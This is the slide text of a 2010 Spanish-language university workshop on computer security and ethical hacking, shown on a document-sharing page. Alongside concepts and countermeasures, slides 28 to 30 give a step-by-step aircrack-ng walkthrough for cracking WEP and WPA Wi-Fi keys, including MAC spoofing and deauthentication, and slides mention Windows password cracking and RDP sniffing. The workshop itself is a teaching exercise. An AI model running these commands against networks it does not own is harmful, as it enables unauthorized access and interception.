BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICAÁngel Encinas
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 
Ejercicios de PROBLEMAS PAEV 6 GRADO 2024.pdf
Ejercicios de PROBLEMAS PAEV 6 GRADO 2024.pdfEjercicios de PROBLEMAS PAEV 6 GRADO 2024.pdf
Ejercicios de PROBLEMAS PAEV 6 GRADO 2024.pdfMaritzaRetamozoVera
 
Criterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosCriterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosJonathanCovena1
 
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática5    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática5    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfenelcielosiempre
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxMaritzaRetamozoVera
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxYadi Campos
 
Cuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfCuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfNancyLoaa
 
Estrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxEstrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxdkmeza
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxzulyvero07
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfPaolaRopero2
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAEl Fortí
 

Kürzlich hochgeladen (20)

actividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° gradoactividades comprensión lectora para 3° grado
actividades comprensión lectora para 3° grado
 
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSOCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
 
INSTRUCCION PREPARATORIA DE TIRO .pptx
INSTRUCCION PREPARATORIA DE TIRO   .pptxINSTRUCCION PREPARATORIA DE TIRO   .pptx
INSTRUCCION PREPARATORIA DE TIRO .pptx
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
 
Ejercicios de PROBLEMAS PAEV 6 GRADO 2024.pdf
Ejercicios de PROBLEMAS PAEV 6 GRADO 2024.pdfEjercicios de PROBLEMAS PAEV 6 GRADO 2024.pdf
Ejercicios de PROBLEMAS PAEV 6 GRADO 2024.pdf
 
Criterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficiosCriterios ESG: fundamentos, aplicaciones y beneficios
Criterios ESG: fundamentos, aplicaciones y beneficios
 
Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
Sesión de clase: Fe contra todo pronóstico
Sesión de clase: Fe contra todo pronósticoSesión de clase: Fe contra todo pronóstico
Sesión de clase: Fe contra todo pronóstico
 
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdfTema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
 
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática5    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática5    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdf
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docx
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
 
Medición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptxMedición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptx
 
Cuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfCuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdf
 
Estrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxEstrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptx
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
 

Seguridad Informatica y Ethical Hacking

  • 1. Universidad Tecnológica del Sur de Sonora eXpLoD Agosto 2010
  • 2. Agenda Presentación Disclaimer Arsenal Conceptos Básicos Seguridad Informática Ingeniería Social Seguridad dentro y fuera del equipo (Tipos de Seguridad) Software Reset Windows Password Tools (Hiren´s & UBCDW) Copy/Paste Hack Attack All Windows Versions (Ubuntu CD) OverView Crack Windows Passwords Tools (OphCrack) Contramedidas Endurecimiento de políticas de seguridad (Hardening) Herramientas de Intrusión: scanners, sniffers, IDS, etc.
  • 3. Agenda Ethical Hacking Ataque Man-in-the-middle (MitM), conceptos Remote Desktop Protocol (RDP), concepto y uso Cain MitM RDP Windows Sniffing Password Attack Contramedidas Network Wireless, conceptos, usos y características DEMO “Cracking Wireless Passwords“ con aircrack-ng OverView Contramedidas Recursos Preguntas y Respuestas Conclusiones Contacto
  • 4. Presentación ¿ Quién eres?, Quien Soy ? ¿ Qué sabes y que te gustaria aprender ? ¿ Por qué ?
  • 5. Disclaimer Todos los contenidos expuestos, actividades realizadas y demostraciones de esta conferencia- taller son con fines 100% educativos, por lo cual los expositores e institución educativa que los imparten se deslindan de cualquier responsabilidad que los participantes a dicho evento llegaran a adquirir por el mal uso o daño que pudieran causar con la información o herramientas aquí expuestas.
  • 6. Arsenal Para la realización de esta conferencia taller utilizaremos: - Desktop PC - VirtualBox - Tarjeta de red inalámbrica soportada por aircrack - Router inalámbrico - Computadora portátil - Maquinas virtuales de Windows XP, 2003, Vista y 7 - CDs de: Ubuntu 9.10, OphCrack, etc. - Software de propósito general
  • 7. Conceptos Básicos Hacker: Es una buena persona que hace cosas malas :P Red de computadoras: Montón de compus unidas por cable para pasarse virus, bajar música y chatear. Sistema Operativo: Programa que controla toda la compu (Windows, Linux, MacOS, Unix, etc.) Sniffer: Olfateador de red (sabueso) Virus: Invento del gobierno para distraer nuestra atención, H1N1
  • 8. Conceptos Básicos Firewall: Software o Hardware que protege los sistemas informáticos de intrusiones en la red Puerto: Número de conexión dentro de una computadora para transferir información en la red Cracker: “Criminal Hacker“ Escritorio Remoto: Aplicación para administrar a distancia una computadora (Ej. VNC y RDP) Windows: Muy CrackHackeable :P (Aquí lo demostraremos, jejejeje )
  • 9. Seguridad Informática ¿Que es? ¿Cómo nos afecta? • Es simplemente el conjunto • Estamos rodeados de elementos de métodos, formas y de seguridad informática: PIN de estándares que permiten tarjeta de débito y crédito, asegurar que las políticas de números de validación IMEI, una organización sean tokens bancarios, contraseñas utilizadas de la manera en de servicios en línea, validadores de sistemas (como Captcha) que fueron planeadas todos estos son parte de nuestra previniendo la alteración o vida diaria, sin una contraseña modificación o reemplazo de no podríamos accesar nuestra los datos o directivas cuenta de correo, o retirar dinero contenidas en nuestros de un cajero y si las perdemos o recursos de información por nos la roban suele ser laborioso (social y legal) el obtenerlos de personas o entidades no regreso. autorizadas. ¿Todo es basado en cómputo? ¿Cómo lo aseguramos? • No, en realidad un recurso • Dependiendo del tipo de informático es todo aquel recurso, si es electrónico que resguarda información, quizá sea necesario usar una ficha bibliográfica, una métodos de biométrica, si es muestra de ADN codificada, algo mecánico, es probable un pequeño papel con un que con un juego de llaves código de acceso para una de seguridad o de candados caja de seguridad mecánica, rotatorios logremos nuestro todo esto es información y objetivo, todo depende es tomado en cuenta al cuanto nos interesa momento de crear políticas, proteger la información. acuerdos y leyes sobre la informática.
  • 10. Ingeniería Social ¿Qué es? ¿Cómo me afecta? ¿Cómo puedo saber si estoy ¿Cómo puedo evitarlo? • Al no validar las referencias siendo victima de un •Sencillo, si no confiamos en la • En el campo de la informática se denomina o no seguir el protocolo de “ingeniero social”? persona que nos pide cierta “Ingeniería social” al seguridad adecuado para • Muy simple, cuando alguien información (supongamos un conjunto de métodos y divulgar contraseñas o nos pide algún tipo de técnico de soporte de nuestro prácticas usados para cualquier otra información información privilegiada y lugar de trabajo) podemos obtener información de sensible, podríamos ser esta persona es insistente pedirle que nos deje sus datos cómplices de un crimen, cuando le requerimos seguir y comunicarnos con el/ella 10 usuarios legítimos y con la México ha acordado con minutos después de validar si información obtenida lograr un protocolo para validar su la petición es legitima, es decir: acceso a sistemas organismos internacionales intención es altamente la homologación y/o solo sigamos los protocolos protegidos, siendo esta probable que estemos que existan para dar práctica de uso común entre adecuación de códigos siendo victimas de un información, podemos crear piratas informáticos y penales para que estos intento de robo de los propios en casa y seguir los delincuentes delitos sean perseguidos. información por un establecidos en la escuela u computacionales. ingeniero social/hacker. oficina.
  • 11. Seguridad Dentro y Fuera Debemos estar conscientes que ningún equipo o sistema es 100% seguro o fiable. Establecer (y seguir) protocolos y procedimientos de seguridad para contraseñas, códigos, PINs, que nos permitan asegurar que cuando nos sean requeridos, quien nos lo pida sea alguien autorizado y con un motivo válido. Adecuar estas políticas a nuestro propio equipo de cómputo y sistemas, portales y sitios que usamos con frecuencia (como longitud de contraseñas, uso de caracteres especiales y mayúsculas, etc.) y prevenir el uso de “cuentas compartidas” o “uso múltiple” pues eso eleva el riesgo de control y seguridad. Ser precavidos, si algo no parece estar correcto es muy probable que no lo este. Si estamos en la escuela u oficina y algo parece estar mal, reportarlo inmediatamente ya sea a nuestro jefe o profesor o al área encargada de sistemas. Seguir los reglamentos (si no nos esta permitido accesar ciertos sitios, no lo hagamos). Seguir nuestro instinto, muchas veces nosotros somos los mejores jueces para evaluar si algo esta bien o no.
  • 12. Tipos de Seguridad: Seguridad Física: Seguridad Física consiste en la "aplicación de barreras físicas y procedimientos de control, como medidas de prevención y contramedidas ante amenazas a los recursos e información confidencial"(1). Se refiere a los controles y mecanismos de seguridad dentro y alrededor del Centro de Cómputo así como los medios de acceso remoto al y desde el mismo; implementados para proteger el hardware y medios de almacenamiento de datos. Seguridad Lógica: La mayoría de los daños que puede sufrir un centro de cómputos no será sobre los medios físicos sino contra información por él almacenada y procesada. La Seguridad Física, sólo es una parte del amplio espectro que se debe cubrir para no vivir con una sensación ficticia de seguridad. Como ya se ha mencionado, el activo más importante que se posee es la información, y por lo tanto deben existir técnicas, más allá de la seguridad física, que la aseguren. Estas técnicas las brinda la Seguridad Lógica.
  • 13. Software Reset Windows Password Tools (Hiren´s & UBCDW) c:windowssystem32configsam
  • 14. Copy/Paste Hack Attack All Windows Versions (Ubuntu CD) Copy/Paste ??¡¡¡ OverView
  • 15. Crack Windows Passwords Tools (OphCrack) Woooow, is Cracking ¡¡¡¡ :x
  • 16. Contramedidas 1- Seguridad Física del equipo 2- Boot CD deshabilitado 3- Password supervisor habilitado 4- Contraseñas robustas contra el password cracking
  • 17. Hardening ¿Qué es? ¿Cómo se logra? • Un conjunto de métodos y directivas • Las técnicas son amplias y van desde que permiten elevar el nivel de la eliminación de cuentas de acceso seguridad de un servidor y validación mediante métodos computacional (principalmente) con alternativos (como LDAP) hasta la el fin de denegar accesos no desinstalación, revisión y adecuación autorizados y evitar intrusiones y/o de servicios, archivos de ataques computacionales, existen configuración e instalación de ciertos programas que nos ayudan a centinelas de cambios en las detectar fallos como “Bastille” de maquinas a “endurecer”, existen HP/Compaq que tuvo un éxito mas o incluso niveles que permiten menos amplio en sistemas con comunicación solo de 1:1 (es decir Solaris y posteriormente en sistemas una maquina solo va a “escuchar” a GNU/Linux. otra que fue validada y no más. ¿Quién lo hace? ¿Qué sistema es el más inseguro? • Principalmente, administradores de • En realidad, existe un mantra que sistemas o consultores de dice: “No hay sistema inseguro, seguridad computacional, la razón solo un mal administrador” es principal de esto es el decir, si adecuamos un equipo y conocimiento requerido en elevamos el nivel de seguridad a lo administración de sistemas e técnicamente posible, es muy infraestructura para poder llevar a probable que los demás errores cabo un buen endurecimiento (con sean bugs del software mismo. lo cual, una vez más, no podemos garantizar que sea 100% mas seguro, solo mas estable).
  • 18. Herramientas de Intrusión: scanners, sniffers, IDS, etc. • Denegación de servicio (PaP o distribuidas) • Exploración de servicios y vulnerabilidades Existen una gran (PenTesting y Exploitation) cantidad de • Rompimiento de claves de autenticación (Auth Cracking) herramientas de este • Capturadores de paquetes promiscuos (Sniffers, AirSniffers) tipo entre las mas • Enumeradores de puertos y adivinadores de comunes usadas en plataforma. • Enmascaradores o “phishing posers” (servicios que contra de servidores: parecen legítimos pero no lo son, enfocados al robo de información e identidad) • Troyanos Por el lado de los • Gusanos ataques a usuarios • Secuestradores y envenenadores de DNS existen las siguientes • Keyloggers herramientas: • Replicadores http://sectools.org/
  • 19. Ethical Hacking ¿Qué es? •La intrusión ética (o ethical hacking) es la aplicación de herramientas de intrusión, penetración, robo, ¿No es contraproducente? personificación y negación de servicio llevado a cabo por •No, al usar las armas que el “hackers éticos”, es decir, enemigo utiliza es mas factible personas con la experiencia y que podamos determinar el conocimiento suficiente para nivel de riesgo, y por tanto la llevar a cabo estas pruebas en respuesta que debemos dar ante nombre de la organización (es un ataque, es, viéndolo como decir de manera legal y prevista) analogía medica, como cuando para determinar el nivel de nos vacunan, pues nos inoculan seguridad de una red de equipos una “versión” del virus del cual o servicios (incluido el aspecto nos quieren hacer inmunes. de ingeniería social). ¿Por qué es importante? ¿Es fiable? •Al conocer el nivel de seguridad •Al contratar nosotros un servicio que se tiene en nuestra (o realizarlo de manera interna) organización es mucho mas estamos confiando en la ética sencillo, que no simple, el tomar profesional de quien evalúa por medidas que puedan subsanar lo que si, siempre llevamos un estas deficiencias. riesgo, pero se establece un contrato de buena fe haciéndolo “suficientemente fiable”.
  • 20. Ataque Man-in-the-middle (MitM), conceptos En criptografía, un ataque man-in-the-middle (MitM o intermediario, en castellano) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas.
  • 21. Ataque Man-in-the-middle (MitM), conceptos El ataque MitM puede incluir algunos de los siguientes subataques: 1. Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos. 2. Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado. 3. Ataques de sustitución. 4. Ataques de repetición. 5. Ataque por denegación de servicio (denial of service).
  • 22. Contramedidas Claves públicas Autenticación mutua fuerte Claves secretas (secretos con alta entropía) Passwords (secretos con baja entropía) Otros criterios, como el reconocimiento de voz u otras características biométricas
  • 23. Remote Desktop Protocol (RDP), concepto y uso Remote Desktop Protocol (RDP) es un protocolo propietario desarrollado por Microsoft que permite la comunicación en la ejecución de una aplicación entre un terminal (mostrando la información procesada que recibe del servidor) y un servidor Windows (recibiendo la información dada por el usuario en el terminal mediante el ratón ó el teclado).
  • 24. Cain MitM RDP Windows Sniffing Password Attack y Contramedidas RDP OverView
  • 25. Network Wireless, conceptos, usos y características El término red inalámbrica (Wireless network) en inglés es un término que se utiliza en informática para designar la conexión de nodos sin necesidad de una conexión física (cables), ésta se da por medio de ondas electromagnéticas. La transmisión y la recepción se realizan a través de puertos. Una de sus principales ventajas es notable en los costos, ya que se elimina todo el cable Ethernet y conexiones físicas entre nodos, pero también tiene una desventaja considerable ya que para este tipo de red se debe de tener una seguridad mucho mas exigente y robusta para evitar a los intrusos.
  • 26. DEMO “Cracking Wireless Passwords“ con aircrack-ng OverView y Contramedidas Free Ilegal INternet
  • 27. DEMO “Cracking Wireless Passwords“ Aircrack: http://www.aircrack-ng.org/ Aircrack Spanish: http://www.aircrack.es/ Compatibilidad de tarjetas inalámbricas con Linux: http://linux-wless.passys.nl/query_alles.php
  • 28. DEMO “Cracking Wireless Passwords“ sudo apt-get install aircrack-ng sudo apt-get install macchanger sudo airmon-ng start wlan0 sudo ifconfig mon0 down sudo macchanger -m 00:11:22:33:44:55 mon0 sudo ifconfig mon0 up sudo airodump-ng mon0
  • 29. DEMO “Cracking Wireless Passwords“ control + c sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0 PARA WEP sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0 PARA WPA sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0 PARA WEP sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0 PARA WPA sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
  • 30. DEMO “Cracking Wireless Passwords“ PARA WEP sudo aircrack-ng -z [nombre red]*.cap Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los mismos, hasta que se nos muestre la clave de la red.
  • 31. Contramedidas Mac Address Filtering Hide Wireless SSID WPAAuthentication System
  • 32. Recursos Aprende Viendo: http://aprendeviendo.org.mx OphCrack: http://ophcrack.sourceforge.net/ UBCD for Windows: http://www.ubcd4win.com/ Top 100 Network Security Tools: http://sectools.org/ Cain & Abel: http://www.oxid.it/cain.html Aircrack-ng: http://www.aircrack-ng.org/ Ubuntu: http://www.ubuntu.com/ Hiren´s Boot CD: http://www.hirensbootcd.net/ Process Monitor: http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx Backtrak: http://www.backtrack-linux.org/
  • 34. Conclusiones La seguridad computacional como un todo. El elemento humano dentro de la seguridad computacional. El establecimiento de reglas para un mejor nivel de seguridad. Necesidad de profesionistas calificados para estos trabajos. Gran amplitud de herramientas OpenSource. Compromiso social y ético para sistemas. Innovación diaria.